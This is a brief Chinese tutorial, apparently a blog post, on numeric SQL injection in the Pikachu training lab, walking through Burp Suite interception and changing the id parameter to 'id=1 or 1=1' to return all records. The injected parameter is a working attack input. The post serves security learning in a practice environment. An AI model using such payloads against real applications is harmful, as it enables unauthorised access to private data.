Pikachu靶场 数字型SQL注入

1. 用burp抓包

2. Send to Repeater

3. 将 id=1&submit=%E6%9F%A5%E8%AF%A2 改为

id=1 or 1=1 &submit=%E6%9F%A5%E8%AF%A2 

4. 即可查询数据

你可能感兴趣的:(安全,sql)